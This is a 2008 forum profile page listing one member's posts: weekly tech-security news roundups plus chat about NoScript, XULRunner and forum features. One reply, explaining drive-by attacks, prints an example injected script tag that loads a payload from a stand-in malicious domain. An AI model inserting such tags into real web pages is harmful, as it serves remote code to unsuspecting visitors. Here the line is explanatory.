topbanner_forum
  *

avatar image

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
  • Tuesday November 11, 2025, 7:28 pm
  • Proudly celebrating 15+ years online.
  • Donate now to become a lifetime supporting member of the site and get a non-expiring license key for all of our programs.
  • donate

Recent Posts

Pages: prev1 ... 26 27 28 29 30 [31] 32 33 34 35 36 ... 50next
751
Living Room / Tech News Weekly: Edition 41 [NEW]
« Last post by Ehtyar on October 10, 2008, 06:18 PM »
The Weekly Tech News
TNWeekly01.gifHi all.
I apologize for the name of this post, but no this is not a repeat of last week's news. It seems the script I use to create the post templates (or as Mouse Man refers to it, the "time space continuum template") had me predicting the news for the coming week as opposed to reporting it for the week past. From now on this will be fixed. See last week's news here.
Next, I'd like to thank 40hz for his excellent banner, which I will be using from now on.  :Thmbsup: :Thmbsup:
Finally, it has been apparent that not being able to link to a specific article makes referencing and replying to the weekly news rather difficult, so I've taken the liberty of adding anchors to the title of each article. From now on, the title of each article will be a hyperlink to that specific article. Try it out by clicking here.
Well that's about it, hope you like this week's news :)


1. Clickjacking FAQ
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115818&source=NLT_SEC&nlid=38
Another link: http://ha.ckers.org/blog/20081007/clickjacking-details/
And another: http://www.darkreading.com/document.asp?doc_id=165073
Aaand again: http://www.darkreading.com/document.asp?doc_id=165431
Index finger getting tired yet? http://www.webmonkey.com/blog/Hackers_are_Watching_You%3A_Flash_Clickjacking_Vulnerability_Exposes_Webcams_and_Mics
A very educational FAQ from ComputerWorld regarding the increasingly common "clickjacking" attack vector. Like we needed another reason to disable flash.

Last week, a pair of security researchers spread the news that a new class of vulnerabilities, called "clickjacking," puts users of every major browser at risk from possible attack.

Robert Hansen, founder and chief executive of SecTheory LLC, and Jeremiah Grossman, chief technology officer at WhiteHat Security Inc., spilled some beans last week after they gave a semi-closed presentation at OWASP AppSec 2008 in New York.


2. New Hack Trashes London's Oyster Card
http://www.techworld.com/security/news/index.cfm?newsID=105337&pagtype=all
Another link: http://arstechnica.com/news.ars/post/20081008-charlie-and-the-broken-rfid-mass-transit-authentication-system.html
Researchers have published source code that will allow tech-savvy people to duplicate smart cards used by Boston's rail network and the London Oyster, among others.

Researchers have published a cryptographic algorithm and source code that could be used to duplicate smart cards used by several major transit systems, including Boston's Charlie Card and the London Oyster card.

Scientists from the Dutch Radboud University Nijmegen presented their findings during the Esorics security conference on Monday in Malaga, Spain. They also published an article with cryptographic details.


3. Symantec Buys Message Labs
http://www.securitypronews.com/insiderreports/insider/spn-49-20081008SymantecBuysMessageLabs.html
Security firm Symantec has agreed to buy online messaging security firm MessageLabs for $US695 million, thereby securing its position in the SOftware-as-a-Service market..

Symantec, the largest maker of computer security and data backup software, said it will pay 310 million pounds sterling and $154 million in US dollars.

The company says its purchase of MessageLabs will give it a stronger position in the rapidly growing Software-as-a-Service (Saas) market and strengthen its lead in the messaging security industry.

MessageLabs is the top provider of online messaging security globally with more than eight million end users at more than 19,000 clients ranging from small business to Fortune 500.


4. Cyberscammers Taking Advantage Of Poor Economy
http://www.wubbfm.com/cc-common/news/sections/lifestylearticle.html?article=4379223
Another link: http://www.darkreading.com/document.asp?doc_id=165537
As one might expect, it appears the online nasties are already using people suffering from the economic downturn to benefit themselves. The attacks appear to be focusing on SPAM and phishing tactics.

Fear surrounding the growing economic calamity is feeding online criminals' efforts to steal consumers' personal information, computer-security experts say.

The number of fake Web sites, spam e-mail and phishing attacks has mushroomed as cybercrooks seek to take advantage of the sudden widespread alarm, the experts say.

Most scams center on spam and phishing against the backdrop of bank failures, mergers and takeovers, the experts tell USA Today.


5. U.S. Gov't Proposes Digital Signing of DNS Root Zone File
http://www.itworld.com/networking/55952/us-govt-proposes-digital-signing-dns-root-zone-file
The United States is finally accepting advice on how to protect the DNS root zone file from attacks. Naturally VeriSign is playing a mine-is-bigger-than-yours game with ICANN over who should hold the keys.

The U.S. government is soliciting input on a way to make the Internet's addressing system less susceptible to tampering by hackers.

Under the idea, records in the DNS (Domain Name System) root zone would be cryptographically signed using DNSSEC (Domain Name and Addressing System Security Extensions), a set of protocols that allows DNS records to carry a digital signature.


6. UCSniff - VoIP Eavesdropping Made Easy
http://www.theregister.co.uk/2008/09/30/voip_eavesdropping_tool/
A new tool has been released to demonstrate just how easy it is to eavesdrop on VoIP conversations.

A security consultant with expertise in protecting phone conversations as they travel over the internet has unveiled a new tool that demonstrates just how vulnerable voice over internet protocol, or VoIP, calls are to interception.

UCSniff bundles a hodgepodge of previously available open-source applications into a single software package that helps penetration testers assess the security of VoIP calls carried over a client's network. It also introduces several new features that make eavesdropping on specific targets a point-and-click undertaking.

UCSniff runs on a laptop that can be plugged in to the ethernet port of the organization being probed. From there, a VLAN hopper automatically traverses the virtual local area network until it accesses the part that carries VoIP calls. Once the tool has gained unauthorized access, UCSniff automatically injects spoofed ARP, or address resolution protocol, packets into the network, allowing all voice traffic to be routed to the laptop.


7. Elvis Has Left the Country
http://freeworld.thc.org/thc-epassport/
As a followup to story number 2 in last week's news, Hacker's Choice have released a video of an e-Passport self-scanner at Amsterdam airport accepting a modified passport purporting to belong to Elvis Presley.

The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.



8. Ransomware Author Tracked Down, But Not Nicked
http://www.theregister.co.uk/2008/10/01/gpcode_author_hunt/
A Russian national, allegedly the creator to the infamous Gpcode Trojan has been identified, but is unlikely to be charged due to Russia's lack of action against cybercrime.

The Russian VXer who created the infamous Gpcode ransomware Trojan has been identified - but an early arrest isn't likely.

With cybercrime way down the priority list in Russia, the malware author - known to the police after security firm Kaspersky Labs winkled out a likely IP number for him - is liable to remain at large for some time.


9. Hackers Penetrate South Korean Missile Manufacturer
http://www.theregister.co.uk/2008/10/01/missile_manufacturer_hacked/
Hackers have broken into a South Korean arms manufacturer's computer system, and may have stolen blueprints.

Black hat hackers were able to steal information from a South Korean missile manufacturer after planting malicious code on the company's computer system, according to news reports.

According to the country's National Security Research Institute, the code was installed on the computer network of LIGNex1 Hyundai Heavy Industries, a manufacturer of guided missiles, ground-to-air weapons, war ships, and submarines.


10. Ecommerce Standard Tightens Up Wireless Security
http://www.theregister.co.uk/2008/10/02/pci_dss_update/
In this latest revision, the Payment Card Industry Data Security Standard will disallow use of WEP from mid-2010 and will ban it in new establishments from April 2009. What a joke.

A revised version of an important security standard for ecommerce merchants was published on Wednesday.

Version 1.2 of the Payment Card Industry Data Security Standard (PCI DSS) mostly tweaks and clarifies the existing framework for the secure processing of credit card data. The 12 existing requirements - covering areas such as the need to used a firewall, store cardholder data securely and encrypt transmission of cardholder data - remain unchanged.


11. RealNetworks Sued Over DVD Copying Software
http://seattletimes.nwsource.com/html/businesstechnology/2008217705_realnetworks010.html
Another link: http://arstechnica.com/news.ars/post/20081005-judge-temporarily-halts-sale-of-realdvd-in-wake-of-lawsuit.html
Half of corporate Hollywood is suing RealNetworks to prevent them from selling their RealDVD DVD copying software.

Hollywood's six major movie studios Tuesday sued Seattle-based RealNetworks to prevent it from distributing DVD-copying software they said would allow consumers to "rent, rip and return" movies or even copy friends' DVD collections outright.

The studios stand to lose key revenue from DVD sales, estimated by Adams Media Research at $14 billion this year, if consumers stop buying DVDs and copy rental discs from outlets like Netflix and Blockbuster instead.


12. T-Mobile Confirm Theft of Personal Data On 17M Customers
http://www.darkreading.com/document.asp?doc_id=165280
T-Mobile, and its parent company Deutsche Telekom have admitted that a USB storage device was misplaced in 2006, and the incident not revealed to customers. Reports indicate the data may be in use by cyber-criminals.

Deutsche Telekom, owner of the T-Mobile wireless network, admitted this weekend that the mobile service suffered a data theft in 2006 that may have exposed the personal information of some 17 million customers.

Deutsche Telekom made a statement about the T-Mobile data theft on Saturday, anticipating the release of a story about the breach by the German magazine Der Spiegel on Sunday.


13. Free Tool Hacks Banking, Webmail, and Social Networking Sessions
http://www.darkreading.com/document.asp?doc_id=165303
A new tool will allow an attacker to hijack online sessions that use secure login.

A researcher will demonstrate a free, plug-and-play hacking tool this week that automatically generates man-in-the middle attacks on online banking, Gmail, Facebook , LiveJournal, and LinkedIn sessions -- even though they secure the login process.

Jay Beale, who recently released the so-called “Middler” open-source tool, will show it off at the SecTor conference in Toronto. Aside from the unnerving capability of hacking into sites that perform secure logins and then use clear-text HTTP, Middler is also designed for use by an attacker with no Web-hacking skills or experience. “The Middler allows an attacker with no Web application-hacking experience to launch attacks that previously required substantial time and skill,” according to Beale.


14. Metasploit Hacking Tool Now Open for Licensing
http://www.darkreading.com/document.asp?doc_id=165636
Metaspoit is now completely open source and openly licensed.

The wildly popular Metasploit hacking tool for the first time is now officially open source, open-license technology that can be incorporated into commercial tools.

The free research and penetration testing tool historically has had restricted, non-commercial licensing so that it could only be used by researchers or in-house penetration testers -- not repackaged, redistributed, or sold. But in the new version 3.2 -- due later this month in its final version -- Metasploit project lead HD Moore and his team have transformed Metasploit into an official open source project, complete with a BSD 3-Clause license arrangement that allows others to sell, rename, or “fork” the code in another direction.


15. Asus Install DVD Woes Continue With Worm On Eee Box
http://arstechnica.com/journals/hardware.ars/2008/10/09/asus-install-dvd-woes-continue-with-worm-on-eee-box
Discussion by Carol Haynes here: https://www.donationcoder.com/forum/index.php?topic=15272.0

This post should probably be cross-posted over at jobs.ars, because Asus may soon be looking for a new preloaded software department. For a second time this year, preloaded software on Asus's popular Eee line of PCs has show itself to have some unintended content. This time, the Windows versions of Asus' Eee box nettop have been loaded with an infectious computer worm.

Last month, recovery DVDs shipped with Eee netbooks were found to contain a software crack for WinRAR, along with secret Microsoft documents meant to be read only by PC OEMs. The DVD also contained MS software with application keys, and source code for a number of Asus applications. The scandal spread, with users finding the same files on recovery DVDs of other Asus computers, and even more bizarre files, including resumes and personal files of Asus employees. At the time, Asus told PCPro "We will be investigating this at quite a high level. Once the investigation is complete, we will ensure it doesn't happen again."


16. Antitrust Suit Against Apple and AT&T Will Proceed
http://arstechnica.com/journals/apple.ars/2008/10/07/judge-antitrust-suit-against-apple-and-att-can-proceed
A class action lawsuit against Apple and AT&T for bricking unlocked iPhones has been allowed to continue.

A federal judge has denied Apple's and AT&T's motions to dismiss a class-action lawsuit filed last year alleging various violations of antitrust and consumer protections laws. The judge agreed to Apple's motion, however, to limit the claims to laws of New York, California, and Washington, where the plaintiffs in the case reside.

The original lawsuit was filed last year after Apple released a contentious 1.1.1 update to iPhone's OS, which "bricked," or rendered inoperable, iPhones that had been modified to work on other carriers and/or run third-party software. When the phones became inoperable, Apple refused to honor the warranty on the grounds that the phones had unauthorized modifications.


17. Mono 2.0 Spreads .Net to Linux and Mac
http://www.linuxinsider.com/story/64746.html
Mono 2.0 is released. Not sure if .NET on Linux and Mac is a good thing or a bad thing myself :S

For developers who have fallen in love with .Net/C#, but aren't married to running their applications on Windows, the Mono Project aims to let Microsoft .Net-based apps run on Linux and Mac OS X, among several other platforms. Sponsored by Novell, the Mono Project has released Mono 2.0 of its cross-platform, open source .Net development framework.

Basically, Mono 2.0 lets users run both client and server applications on Linux, and helps developers figure out which changes they may need to make to their applications for .Net-to-Linux migrations.


18. Sony, Microsoft Virtual Communities to Start
http://news.wired.com/dynamic/stories/A/AS_TEC_JAPAN_SONY_MICROSOFT?SITE=WIRE&SECTION=HOME&TEMPLATE=DEFAULT&CTIME=2008-10-09-08-34-28
Just to tick off the Playstation/X-Box zealots, I thought I better post this article about the two companies blatantly ripping off Nintendo's Mii ;)

Video game rivals Sony and Microsoft are going head-to-head in virtual worlds for their home consoles later this year.

Both companies announced their services, which use graphic images that represent players called "avatars," Thursday at the Tokyo Game Show.

Sony Corp.'s twice delayed online "Home" virtual world for the PlayStation 3 console will be available sometime later this year, while U.S. software maker Microsoft Corp., which competes with its Xbox 360, is starting "New Xbox Experience" worldwide Nov. 19.


19.  Apple Hears Developers, Nixes IPhone NDA
http://www.webmonkey.com/blog/Apple_Hears_Developers__Nixes_iPhone_NDA
Apple has removed the non-disclosure agreement associated with the iPhone's Software Development Kit.

iPhone developers are free at last to talk about their applications. Apple has officially dropped the nondisclosure agreement that prohibited developers from discussing the iPhone’s operating system, application code and development kit, according to an announcement made on Apple’s website Wednesday morning.

Meanwhile, across the internet, Ewoks pound drums and sing songs. Or, rather, developers are finally venting their frustration and enjoying the freedom to talk about all their hard work over the last few months without fear of Apple’s retribution.


20.  Gmail Helps Stop Your Drunken E-mail Rants
http://www.webmonkey.com/blog/Gmail_Helps_Stop_Your_Drunken_E-mail_Rants
*cough*

Is your Saturday morning inbox filled with regret and self-loathing for the drunken e-mails you fired off the night before? If so, Gmail might have a solution for you. Google’s Gmail Labs has a new experimental featured dubbed “Mail Goggles” which will attempt to prevent you from sending out those ill-advised late night e-mails.

Gmail developer Jon Perlow created Mail Goggles as a kind of e-mail sobriety test. It works by stopping your message when you hit send and then presents a series of simple math problems you need to solve before you really send the e-mail.

Ehtyar.
752
Support real free software and use k-meleon :) It is an awesome piece of browser with alot of features and it is not bloated like firefox.
Not all of us have the luxury of ignoring the various engines that will attempt to render our pages. I don't know about you but I'd much rather test with Iron or Chromium than Chrome.
If you're going to contribute, please make your posts relevant or constructive.

Ehtyar.
753
Thanks guys, been looking for something like this.

Ehtyar.
754
Living Room / Re: I can haz LOLMouser plz?
« Last post by Ehtyar on October 09, 2008, 05:46 AM »
HAH, loving yours f0dder :D

Ehtyar.
755
Developer's Corner / Re: XULRunner - XUL & JS For Desktop Applications
« Last post by Ehtyar on October 08, 2008, 11:27 PM »
I'm currently re-learning Java development so I'm wondering what advantages XULRunner would have over Java since they are both cross-platform.
The BIG advantage I can see is it isn't Java ;)
Hehehe, I was going to keep my mouth shut, but I see I needn't have :P
Seriously though, I can see it being more useful to people who are primarily experienced as web developers. XULRunner lets you create desktop apps using HTML/CSS/Javascript, which is a powerful combo if you're already using them.
HTML & JS are widely considered to be some of the best languages for beginners. I would consider XULRunner to also be a good training package, not just for web developers.
While I haven't tried it, I do plan on using XULRunner for at least a small project sometime soon, especially as its easy to use Python while doing so: Python XULRunner Application
I've come across the Python interface before, but not being a huge fan of python myself (shutup tin man :P) I never tried it. After reading your post I decided to give it a once over. The interoperability is rather impressive to me, though I don't see any huge benefit, unless you're really into python and don't mind the additional performance hit. The examples [1] provided there are a bit rough around the edges, so you will need to do some work to get them to run. If anyone woiuld like assistance in this area, feel free to reply or pm me.

Ehtyar.
756
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 08, 2008, 02:47 PM »
Hahaha, that's awesome.
You're probably right about using a single image 40hz. I'll keep the sextant one going, then.

Ehtyar.
757
Site/Forum Features / Re: Using Anchors Within Posts
« Last post by Ehtyar on October 08, 2008, 02:41 PM »
Well I'm glad i wasn't the only one who didn't know about this. I guess neither of us have the complete dumba$$ badge nosh ;)

Ehtyar.
758
Site/Forum Features / Using Anchors Within Posts
« Last post by Ehtyar on October 08, 2008, 06:43 AM »
This may end up making me look like a complete dumba$$, but Mouse Man asked me to post this here. So anyway, for those who want to be able to link to a specific section of their post (I will be using this from now on in the Weekly Tech News), you can use the [anchor] and [iurl][/iurl] bbc tags which I've only recently discovered, hence this post.
To add an anchor to your post you place the [anchor] tag somewhere in your document with a unique name e.g.
[anchor=my_unique_name]
Then, when you wish to link to this anchor, you use the [iurl][/iurl] (internal URL) tags to link to the anchor like so:
[iurl=#my_unique_name]go to my anchor[/iurl]
You can try this out by clicking here.

Ehtyar.













This has been a test of the emergency broadcast..er..anchor system.
759
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 07, 2008, 07:07 PM »
A small request: when an item has to do with an exploit, it would be nice if the particular exploit could be mentioned in your summary. For instance, the summary for #1 is veeeery vague and sensationalist-sounding, would've been nice if it included "defeats syncookie protection" (that way I would know, rather than guess, it was a new items I had already read :)).
Thanks f0dder, good advice as usual.
And here's a few more  if you want to try some alternatives...
 (see attachment in previous post)
Thanks again 40hz :Thmbsup: I'm not sure if it's doable, but if they can each be made with the same ratio, I would rotate them week by week, but the sextant one is my favorite :)

Ehtyar.
760
Living Room / Re: One answered question before you died
« Last post by Ehtyar on October 07, 2008, 07:26 AM »
Oooh, I love these introspective/philosophical questions, though I rarely answer them myself. What about:
Is 42 really the meaning of life?
Nah, just kidding. Need some time to come up with a proper one. Great question  :Thmbsup:

Ehtyar.
761
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 07, 2008, 06:05 AM »
I've tried to avoid putting my name to the news, but this is just too cool to pass up. This one will be the cap for my next news 40hz, some cody currency coming your way. Thanks  :Thmbsup:

Ehtyar.
762
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 04, 2008, 05:27 PM »
Excellent :) Mouse man, I'm afraid my threads are microspeak free zones :P

Ehtyar.
763
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 04, 2008, 04:51 PM »
Hmm, perhaps we can replace the screen shot of the first article with the sign? I was having a lot of difficulty choosing the "most important" article anyway.

Ehtyar.
764
Mouser's Zone / Re: New Portable Mode for My Apps
« Last post by Ehtyar on October 04, 2008, 03:17 PM »
Thank you Mouse Man, very much appreciated here.  :Thmbsup: :Thmbsup:

Ehtyar.
765
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 04, 2008, 03:16 PM »
The scary thing about no 7 is not the actual monitoring itself (because it only affects the Chinese), but the fact that e-bay entered into this agreement voluntarily. Makes you wonder what they're doing with your Skype conversations.

Ehtyar.

"Where financial interest lies, find too the place where Justice dies."
Very nice quote, I'll save that one.
If Tech News is really going to be a regular weekly, would it make more sense to give it it's own child board?
Mouse man and I discussed our possibilities after zridling suggested the same last week. We've decided against it for the time being, at least until there's a few more releases under my hat.

Ehtyar.
766
Living Room / Re: Tech News Weekly: 41
« Last post by Ehtyar on October 04, 2008, 07:59 AM »
The scary thing about no 7 is not the actual monitoring itself (because it only affects the Chinese), but the fact that e-bay entered into this agreement voluntarily. Makes you wonder what they're doing with your Skype conversations.

Ehtyar.
767
Living Room / Tech News Weekly: 40
« Last post by Ehtyar on October 03, 2008, 07:37 PM »
The Weekly Tech News
Hi all. Just a few quick messages:
First, this is the new layout in response to feedback from last week's news. As always, any constructive feedback is appreciated.
Second, two of the articles in this week's news were submitted by forum members. If anyone would like to contribute a story that I may have missed in a previous week, or simply would like to ensure that I do include a story for a following week, please leave me a PM on the forum or on irc.
Thanks, Ehtyar.

1. TCP Flaws Put Websites At Risk
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html
http://news.cnet.com/8301-1009_3-10056759-83.html
Researches have found several fundamental flaws in TCP that, if exploited, may be capable of bringing down internet heavyweights like Google or Microsoft.

Screenshot - 4_10_2008 , 9_37_21 AM_thumb.png

A pair of security experts are now discussing several fundamental issues with the TCP protocol that can be exploited to cause denials of service and resource consumption on virtually any remote machine that has a TCP service listening for remote connections.

The problems, which were identified as far back as 2005, are not simply vulnerabilities in products from one or two vendors, but are issues with the ways in which routers, PCs and other machines handle TCP connection requests from unknown, remote machines. The attacks can be carried out with very little bandwidth, such as that available on a cable modem, and there don't appear to be any workarounds or fixes for the problems at this point.


2. How To Clone and Modify E-Passports
http://www.schneier.com/blog/archives/2008/09/how_to_clone_an.html
A group of hackers have released a tool allowing people to clone and modify electronic passports by exploiting a weakness that is apparently the result of using self-signed certificates...but who do you make the CA of the entire globes' passports?

So what's the solution? We know that humans are good at Border Control. In the end they protected us well for the last 120 years. We also know that humans are good at pattern matching and image recognition. Humans also do an excellent job 'assessing' the person and not just the passport. Take the human part away and passport security falls apart.


3. Top Secret MI6 Camera Sold On e-Bay
http://www.techcrunch.com/2008/09/30/top-secret-mi6-camera-sold-to-the-highest-bidder-on-ebay/
A camera containing top secret information, including credentials for logging into their network, was sold by an MI6 agent on e-Bay.

A 28-year-old delivery man from the UK who bought a Nikon Coolpix camera for about $31 on eBay got more than he bargained for when the camera arrived with top secret information from the UK’s MI6 organization.

Allegedly sold by one of the clandestine organization’s agents, the camera contained named al-Qaeda cells, names, images of suspected terrorists and weapons, fingerprint information, and log-in details for the Secret Service’s computer network, containing a “Top Secret” marking.


4. Microsoft, Washington State Sue Scareware Purveyors
http://voices.washingtonpost.com/securityfix/2008/09/microsoft_washington_state_tar.html
Microsoft and the state of Washington gave stepped up to take on groups that use false and/or misleading security alerts to trick concerned customers into purchasing software.

Microsoft Corp. and the state of Washington this week filed lawsuits against a slew of "scareware" purveyors, scam artists who use fake security alerts to frighten consumers into paying for worthless computer security software.

The case filed by the Washington attorney general's office names Texas-based Branch Software and its owner James Reed McCreary IV, alleging that McCreary's company caused targeted PCs to pop up misleading security alerts about security threats on the victims' computers. The alerts warned users that their systems were "damaged and corrupted" and instructed them to visit a Web site to purchase a copy of Registry Cleaner XP for $39.95.


5. Nasty web bug descends on world's most popular sites
http://www.theregister.co.uk/2008/09/30/web_bug_bites_sites/
http://news.cnet.com/8301-1009_3-10056854-83.html

Princeton University researchers have uncovered a series of cross-site request forgeries in some of the worlds most popular websites, one of which would have permitted fund transferal from a victims bank account. Internet Explorer and Firefox users are known to have been vulnerable.

Underscoring the severity of of an exotic form of website bug, security researchers from Princeton University have cataloged four cross-site request forgeries in some of the world's most popular sites.

The most serious vulnerability by far was in the website of global financial services company ING Direct. The flaw could have allowed an attacker to transfer funds out of a user's account, or to create additional accounts of behalf of a victim, according to this post from Freedom to Tinker blogger Bill Zeller.


6. Cybersecurity holes exposed in Los Alamos nuke lab
http://www.theregister.co.uk/2008/09/29/los_alamos_cyber_insecurity/
The Los Alamos National Laboratory has been found to be severely under-secured by a US Government Accountability Office audit.

The Los Alamos National Laboratory - easily the world's most sensitive and sophisticated research institution - is marred by cybersecurity weaknesses that compromise the way information on its unclassified network is protected.

According to an audit by the US Government Accountability Office (GAO), the New Mexico-based LANL recently began implementing measures to shore up information security. But vulnerabilities remain on its unclassified network, which contains sensitive information involving controlled nukes, export control, and personal details of lab employees. Physical security was also found to be lacking at the facility, one of only three US National Nuclear Security Administration (NNSA) labs.


7. Time To Look For A Skype Alternative (Thanks 40hz)
http://www.ghacks.net/2008/10/02/time-to-look-for-a-skype-alternative/
http://news.cnet.com/8301-1009_3-10056127-83.html
http://news.cnet.com/8301-1009_3-10057580-83.html


The voice over IP client Skype never got off the radar of privacy activists. There were always rumors about backdoors in the voice communication software and that several organizations were able to record calls made by Skype users although Skype claimed otherwise.

Skype messages were in the focus of privacy groups since first news about text filtering messages in China became known to the public. Back then Skype released an official statement that the text filter applied by the Chinese Skype partner Tom Online would not affect security and encryption mechanisms of Skype, that people’s privacy would not be compromised and calls, chats and other forms of communication on Skype would continue to be encrypted and secure.

Researchers and privacy activists of the University of Toronto discovered files on unprotected Chinese computers that contained filtered Skype messages that were recorded in China.


8. Adware supplies one third of all malware
http://news.cnet.com/8301-1009_3-10056912-83.html
A report released by Panda security has alleged that one third of all new malware is generated by adware, particularly fake antivirus products.

On Thursday, Panda Security released its report for the third quarter stating that adware is responsible for one third of all new malicious software. In particular, the security company cited increased use of fake antivirus scanners.

The fake scanners typically report a computer infection and suggest downloading an application to remove the malware. Once downloaded, the scanners then ask computer users to purchase the application before it can remove an infection that never really exists. The goal of these attacks is financial gain.


9. New phishing attempt targets bank customers
http://news.cnet.com/8301-1009_3-10057180-83.html
A bracket of the acquisitions (Thanks housetier)
Phishers appear to be capitalising on the downfall of the global economy.

Many people are wondering what to do now that their bank has been acquired in the wake of the lending crisis. Well, whatever you do, don't click on links in e-mails purportedly sent by your bank.

Security firm SonicWall said Thursday that it has been seeing e-mails that attempt to lure people to fake bank Web sites, where they are asked to re-verify their personal and bank information as part of a merger.


10. Verizon gets industry-specific in breach report
http://news.cnet.com/8301-1009_3-10056490-83.html
An interesting report from Verizon detailing industry-specific vulnerability rends.

Risks factors for data breaches vary industry to industry and defy a "cookie cutter" approach to security, according to a report released Thursday by Verizon Communications.

The new report (PDF) builds on data released in June. The initial report spanned four years and included more than 500 forensic investigations involving 230 million compromised records.


11. Plant Tweak Could Let Toxic Soil Feed Millions
http://blog.wired.com/wiredscience/2008/10/plant-tweak-cou.html
A single genetic switch could allow crops to grow in aluminum-poisoned soil.

Thanks to a genetic breakthrough, a large portion of Earth's now-inhospitable soil could be used to grow crops -- potentially alleviating one of the most pressing problems facing the planet's rapidly growing population.

Scientists at the University of California, Riverside made plants tolerant of poisonous aluminum by tweaking a single gene. This may allow crops to thrive in the 40 to 50 percent of Earth's soils currently rendered toxic by the metal.


12. Google, Hotmail CAPTCHA Cracked
http://arstechnica.com/news.ars/post/20081002-right-back-at-ya-captcha-bad-guys-crack-gmail-hotmail.html
http://www.itsecurity.com/blog/20081003/xrumer-spambot-cracks-captchas/
A previously well-known software XRumer has received a substantial upgrade, allowing it to break almost every form of CAPTCHA currently in use.

The decline in CAPTCHA efficacy has been an ongoing story in 2008, as hackers and malware authors have steadily found ways to chip away at the protection these security practices were once thought to offer. Now, new findings indicate that both Gmail and Windows Live Hotmail have been compromised again, this time via a more-streamlined attack process. With two of the largest webmail providers once again vulnerable, CAPTCHAs clearly aren't meeting the security needs of either company, and it may be time to reevaluate the use of them altogether.


13. RapidShare must remove infringing content proactively
http://arstechnica.com/news.ars/post/20081001-german-court-says-rapidshare-must-get-proactive-on-copyrighted-content.html
If a German court ruling is upheld, Rapidshare may no longer be able to plead ignorance of infringing content hosted on their servers.

File sharing service RapidShare may find itself without a viable business model if a German court ruling stands. After getting sued by a German copyright holder, the company argued that it was doing all it could to screen out copyrighted material. The court, however, has ruled that its efforts were insufficient, raising questions about whether doing anything that was legally sufficient could be done without incurring enough costs to sink the company.

RapidShare is one of a large number of companies that will host large files for users who need to exchange them with friends and family. Like many of these companies, it offers a free service with limited features in the hopes of enticing users to spring for the cost of a premium service, which offers some significant perks, such as hosting larger files, unlimited download speeds, and permanent storage. All of this occurs through a simple web interface, and doesn't involve the P2P transfers that have attracted the ire of ISPs and the copyright industry. As a result, their popularity is growing rapidly; RapidShare accounts for five percent of all IP traffic in some regions.


14. Blizzard awarded $6 million in damages from WoW bot maker
http://arstechnica.com/news.ars/post/20081001-blizzard-awarded-6-million-in-damages-from-wow-bot-maker.html
World of Warcraft creator Blizzard have been awarded $6 million in a court case against Glider, a company that produced software to automate gameplay, thse of which was against Blizzard's Terms of Service.

The case Blizzard brought against bot-maker MDY Industries has been going on since 2006, and while a judge ruled in July that MMOGlider infringed on Blizzard's copyrights, the question of whether the bot violates the DMCA is still open. That has not stopped the judge from awarding $6 million in damages in the case.

It's unknown how much money MDY Industries has made from its product MMOGlider, which allows users to automate the boring parts of World of WarCraft and essentially grind forever with no user involvement, but the $25 program had sold around 100,000 copies as of last year. In other words, the product was big business. Unfortunately, it also violated the game's terms of service.



Ehtyar.
768
Living Room / Re: Virus/Worm attacks - are they getting worse?
« Last post by Ehtyar on October 03, 2008, 06:49 AM »
Most often you're perfectly safe trusting javascript originating from a site you actually do trust (amazon.com for example). The trouble originates in things like SQL injection, whereby a script tag is inserted into the document which requests your browser load javascript from a different domain e.g.
<script src="http://www.maliciousdomain.com/driveby.js" />
Thus, amazon.com scripts would run, as they're trusted, while the injected script would be blocked, as the code does not originate from amazon.com.

Ehtyar.
769
Living Room / Re: I can haz LOLMouser plz?
« Last post by Ehtyar on October 03, 2008, 06:36 AM »
THE FIRE: ur on it
AWESOME
Okay, I got some more:
Fun Razor (see attachment in previous post)
ROFL
*cough*come-to-the-irc-channel-to-learn-all-our-inside-jokes*cough*

Ehtyar.
770
Living Room / Re: Virus/Worm attacks - are they getting worse?
« Last post by Ehtyar on October 02, 2008, 09:17 PM »
Firstly, you would naturally avoid those sites where you can. Where you can't, you start enabling subdomains of the primary domain until the content renders correctly, then carry on to those domains that appear to be legitimate. If that approach doesn't work, you can temporarily allow the entire page, though that really defeats the point of NoScript. NoScript can be a lot of work, but it's a lot of work for a good reason.

Ehtyar.
771
Living Room / Re: Virus/Worm attacks - are they getting worse?
« Last post by Ehtyar on October 02, 2008, 07:00 PM »
Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.
I held my tongue, but I would have asked the same questions.

Ehtyar.
772
Developer's Corner / Best Language For Binary Parsing?
« Last post by Ehtyar on October 02, 2008, 04:31 PM »
Hi all.
If you needed to parse some binary data (for examples, PE headers), what scripting language would you use and why? I've seen a few in Python (though they've all been too complex what I require), though I would probably be more comfortable in Perl. Anyway, I just wanted to see if anyone had any opinions before I start investing too much time in it. Any suggestions are welcome.

Thanks for any replies, Ehtyar.
773
Living Room / Re: The Weeklies: 40
« Last post by Ehtyar on October 02, 2008, 03:34 PM »
Much better would be anchors in the initial post that followups could point a URL at.  Probably beyond the ability of the board software.
Yes, and yes.
1 - Disclaimer: Not implying the Ehtyar is any way, shape or form poor - just that given a choice, he chose the poor one..........errrrr........that didn't come out right.........oh crap, I'm in the same country.........quick! HIDE!
Disclaimer: Brain numb........04:12 in the morning.........can't think of anything..........ignore me......................please.
LOL, it's all good, come to the IRLDD and you're forgiven :P
hey, 4wd, you're pretty good at the numbers thing yourself ;D
LOL!

Ehtyar.
774
Living Room / Re: The Weeklies: 40
« Last post by Ehtyar on October 02, 2008, 07:08 AM »
The new format will include numbering, and I will ask replies to reference the post they're responding to by number.

Ehtyar.
775
Living Room / Re: The Weeklies: 40
« Last post by Ehtyar on October 01, 2008, 03:26 PM »
Curiosity question: Why the "40" in the thread title?
It's the 40th week of the year.

Ehtyar.
